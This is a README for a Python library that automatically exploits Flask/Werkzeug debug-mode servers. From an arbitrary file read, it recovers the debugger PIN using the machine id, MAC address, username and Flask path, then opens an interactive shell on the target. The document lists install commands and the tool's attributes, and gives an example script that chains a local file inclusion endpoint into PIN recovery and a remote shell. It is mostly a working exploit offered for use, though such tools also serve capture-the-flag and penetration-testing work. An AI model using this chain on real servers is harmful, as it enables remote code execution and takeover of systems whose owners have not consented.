Wconsole Extractor is a library which allows to automatically exploit a flask debug mode server. You just need to write a file leak function, pass it to the class
WConsoleExtractor
constructor and you can access to all the elements related to the debug mode. Moreover, you can call theshell
function to obtain an interactive shell.
Global installation:
pip3 install wconsole-extractor
Python virtual environment:
python3 -m venv env
source env/bin/activate
pip3 install wconsole-extractor
# Deactivate environment
deactivate
Global installation:
git clone https://github.com/Ruulian/wconsole_extractor.git
cd wconsole_extractor
pip3 install .
Python virtual environment:
git clone https://github.com/Ruulian/wconsole_extractor.git
cd wconsole_extractor
python3 -m venv env
source env/bin/activate
pip3 install .
# Deactivate environment
deactivate
Note: The target operating system must be a Linux distribution.
In order to use correctly the library, you need to have an arbitrary file read on the target and implement it in python.
You must write a function that takes a filename as parameter and returns the content of the file on the target. If the file is not found, the function should return an empty string.
From WconsoleExtractor
instance, you can access mutiple attributes:
# Target information
extractor.target # Specified target
extractor.base_url # Target base url
extractor.hostname # hostname
# Versions
extractor.python_version # Python version
extractor.werkzeug_version # Werkzeug version
# Probably public bits
extractor.username # User who launched the application
extractor.flask_path # Flask installation path
extractor.modname # Constant "flask.app"
extractor.class_name # Constant "Flask"
extractor.probably_public_bits # Probably public bits [username, modname, class_name, flask_path]
# Private bits
extractor.machine_id # Machine id
extractor.uuidnode # MAC address in decimal
extractor.private_bits # private bits
# Post process information
extractor.pin_code # Werkzeug PIN CODE
extractor.token # Werkzeug console token (available in HTML source code)
# Functions
extractor.shell() # Get interactive shell
from wconsole_extractor import WConsoleExtractor, info
import requests
def leak_function(filename) -> str:
r = requests.get(f"http://localhost:5000/lfi?path={filename}")
if r.status_code == 200:
return r.text
else:
return ""
extractor = WConsoleExtractor(
target="http://localhost:5000",
leak_function=leak_function
)
info(f"PIN CODE: {extractor.pin_code}")
extractor.shell()
👤 Ruulian
- Website: https://ruulian.me
- Twitter: @Ruulian_
Contributions, issues and feature requests are welcome!
Feel free to check issues page.
Give a ⭐️ if this project helped you!
This project is MIT licensed.
This README was generated with ❤️ by readme-md-generator